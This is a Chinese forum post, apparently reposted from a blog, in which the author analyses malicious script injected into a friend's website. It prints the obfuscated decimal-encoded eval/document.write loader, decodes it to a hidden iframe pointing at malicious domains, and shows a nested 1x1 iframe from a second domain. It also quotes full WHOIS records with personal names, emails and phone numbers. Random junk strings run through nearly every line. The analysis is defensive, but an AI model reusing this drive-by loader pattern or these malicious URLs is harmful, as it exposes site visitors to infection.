[原创]一篇刚写的分析木马手记

首发在我的博客里面， @cNI|T  
lR^Qm|  
http://www.areway.cn/?p=175 6 VDF@V$E  
'o9V0#$!  
Y:BrAa[  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： K2v
)"|T)  
          {a%cU[q  
<script>t=’60,105,102,114,97,109,101, v>l?d27R  
32,115,114,99,61,104,116,116,112,58,47,47, \?}.+v  
102,114,101,101,46,117,45,117,117,117,46,99, za
PR>:r0  
110,47,101,114,114,111,114,46,104,116,109, CcETS}Q0C  
32,119,105,100,116,104,61,49,48,48,32,104, 3qZ{yr2N[  
101,105,103,104,116,61,48,62,60,47,105,102, Np_6ZUaqz  
114,97,109,101,62′; obGSc)?j  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> cn{l %6K  
                                                                                                  Gl9
a5b  
<script>t=’60,105,102,114,97,109,101,32,115, "$9ZkADO  
114,99,61,104,116,116,112,58,47,47,102,114, .<hv&t  
101,101,46,117,45,117,117,117,46,99,110,47, l>q.BG  
101,114,114,111,114,46,104,116,109,32,119, V^5 t~)#46  
105,100,116,104,61,49,48,48,32,104,101,105, Cvy;O~)  
103,104,116,61,48,62,60,47,105,102,114,97, ]UTP~2N  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); /m:}rD  
document.write(t);</script> 2N#L'v@g=+  
                                                                                                  tJ3s#q6  
<html xmlns=” !{\c`Z<#  
http://www.w3.org/1999/xhtml jL>r*=K)%  
“> (>23[;.0  
<head> H8U*oLlc  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> #k, kpL<a  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> 6, ~aV  
<title>首页 - 爱生活家庭网 gUQCKNw  
                                                                                                                                                    ?c*d z{  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 &2^V<(19  
转换字符串后的大概内容是（谁点击后果自付）： Sj+#yct-  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… TA5M4r6  
                                                                                                                                  *x!5I$~J  
查询玉米u-uuu.cn的详细信息： so?1lG  
Domain Name: u-uuu.cn }o.ZCACYg  
ROID: 20070901s10001s64972306-cn c:5BQr '  
Domain Status: ok G<DUy^$i  
Registrant Organization: 王雷 ZO^+KE"  
Registrant Name: 王雷 /8R1$7  
Administrative Email: czlovexs@126.com E u  
Sponsoring Registrar: 北京万网志成科技有限公司 (reD  
Name Server:ns.yovole.com u:|5jF  
Name Server:ns1.yovole.com z/=v@@tj  
Registration Date: 2007-09-01 17:54 G#>X~qk()  
Expiration Date: 2008-09-01 17:54 hBw~l?G  
最后PING了一下地址 都没有什么…. kPe9G  
                                                                                                hz|$3*q  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. uOx$@1v,  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> !j@ 8:j0WY  
<script language=”javascript” src=” q\<vCKI-^  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script oY: "nE  
> ;MD{p1w  
这个玉米应该有可能是木马作者的： 3 -FNd~%  
foafau.info的详细信息： `)fGw7J {  
Access to INFO WHOIS information is provided to assist persons in usip>y  
determining the contents of a domain name registration record in the Ws(>} qjy  
Afilias registry database. The data in this record is provided by R_}(p2  
Afilias Limited for informational purposes only, and Afilias does not @ ri.r1  
guarantee its accuracy.  This service is intended only for query-based Fk:(%ci  
access. You agree that you will use this data only for lawful purposes ] $*cmk(Y  
and that, under no circumstances will you use this data to: (a) allow, &0`L;1R  
enable, or otherwise support the transmission by e-mail, telephone, or q ^?{6}sy  
facsimile of mass unsolicited, commercial advertising or solicitations R<)uvW_@  
to entities other than the data recipient’s own existing customers; or +Xk!)Ge5E*  
(b) enable high volume, automated, electronic processes that send n:+MNr  
queries or data to the systems of Registry Operator, a Registrar, or '7^_$M3$\  
Afilias except as reasonably necessary to register domain names or :|g{gi  
modify existing registrations. All rights reserved. Afilias reserves a@./e @
p  
the right to modify these terms at any time. By submitting this query, )_uK(UNZ5  
you agree to abide by this policy. ~jaGf  
Domain ID:D22418703-LRMS y;H 3g#  
Domain Name:FOAFAU.INFO 
d8>D=Ve  
Created On:20-Nov-2007 16:05:42 UTC rv%Xvs B  
Last Updated On:20-Nov-2007 16:05:44 UTC DzEixE-  
Expiration Date:20-Nov-2008 16:05:42 UTC }m?L/Y'}  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) &nYmVwi?"Q  
Status:CLIENT DELETE PROHIBITED y[vjqfdmU  
Status:CLIENT RENEW PROHIBITED n3w2&  
Status:CLIENT TRANSFER PROHIBITED _)Ms9RN  
Status:CLIENT UPDATE PROHIBITED D~Su822  
Status:TRANSFER PROHIBITED |(fWT}tg  
Registrant ID:GODA-040110615 >=bO@)[  
Registrant Name:liu hong FP$]D~DMo  
Registrant Organization: ]!QeJ'BLM  
Registrant Street1:beijing ]iPdAwc.1  
Registrant Street2: %rsW:nl  
Registrant Street3: uIu0"pv`x  
Registrant City:beijing @`{UiTNX`  
Registrant State/Province: >jcNo3S  
Registrant Postal Code:100000 =uH`EkY:  
Registrant Country:CN bCsQWsj^NW  
Registrant Phone:+86.860108888777 dNR4h  
Registrant Phone Ext.: |@+ x9|'W  
Registrant FAX: <8Ad\MU  
Registrant FAX Ext.: Nuj%8om6  
Registrant Email:bbbshiji@163.com J_,y?}.e3  
Admin ID:GODA-240110615 l"Css~^  
Admin Name:liu hong VybiuP  
Admin Organization: g8C+j6uR0  
Admin Street1:beijing 0|cQx VJb  
Admin Street2: vgV0a{u"  
Admin Street3: 3yQ(,k#  
Admin City:beijing $]9d((u4  
Admin State/Province: I'!KWpYJT  
Admin Postal Code:100000 C5m*pGImG  
Admin Country:CN G100L}d"N  
Admin Phone:+86.860108888777 h*Ej}_  
Admin Phone Ext.: SWu=n1J.?H  
Admin FAX: @"6BvGU2s  
Admin FAX Ext.: z')'8155  
Admin Email:bbbshiji@163.com OG.`\G|  
Billing ID:GODA-340110615 h)w<{/p(  
Billing Name:liu hong _Nd\Cm  
Billing Organization: </eh^<_~  
Billing Street1:beijing Z?~7#F~Z`  
Billing Street2: C][`Dk\D{  
Billing Street3: vi'K|[!?  
Billing City:beijing r6A
7}v  
Billing State/Province: A;kB"Tx  
Billing Postal Code:100000 I|:*Dy,~  
Billing Country:CN ? in&/ZrB  
Billing Phone:+86.860108888777 PiN3t]2  
Billing Phone Ext.: a*=e 3nS  
Billing FAX: d;>:<{z@CD  
Billing FAX Ext.: #2pgh?  
Billing Email:bbbshiji@163.com sbRg=k&Ns  
Tech ID:GODA-140110615 `jJb) z3D  
Tech Name:liu hong QF>H>=Za=  
Tech Organization: P<bA~%<7"[  
Tech Street1:beijing l|DOsI'r  
Tech Street2: X:DHz0S  
Tech Street3: HLS^Ga,(  
Tech City:beijing I(2ID +  
Tech State/Province: '  _N >  
Tech Postal Code:100000 )/BKN`,  
Tech Country:CN i'a M#4V  
Tech Phone:+86.860108888777 9J<KR#M  
Tech Phone Ext.: 1$c*/Tc:E  
Tech FAX: 4X^0:.bT&  
Tech FAX Ext.: I%%$O'S  
Tech Email:bbbshiji@163.com RvVnVcn^#  
Name Server:NS27.DOMAINCONTROL.COM C?zC
|0  
Name Server:NS28.DOMAINCONTROL.COM (bXCc  
Name Server: A
/'G.H  
Name Server: 1@/+ c  
Name Server: bo]k9FC  
Name Server: LnBkd:>}  
Name Server: 4kx#=MLt
 
Name Server: qoEOM%dAqV  
Name Server: >~6 ;9{@  
Name Server: <{'':/tXI  
Name Server: zj8;ENhEI  
Name Server: YyI|^f8C  
Name Server: h.DQ6!?;s  
                                                                                                          ;Eck7nRA)  
接着下载每个文件里面的代码： )xi|BqQz  
一步一步看.. BV<LIrAS  
B6
4%| S  
Y*4\K%e(  
~ejHA~QC  
Bs^W0K$uBO  
nHA2p`T  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来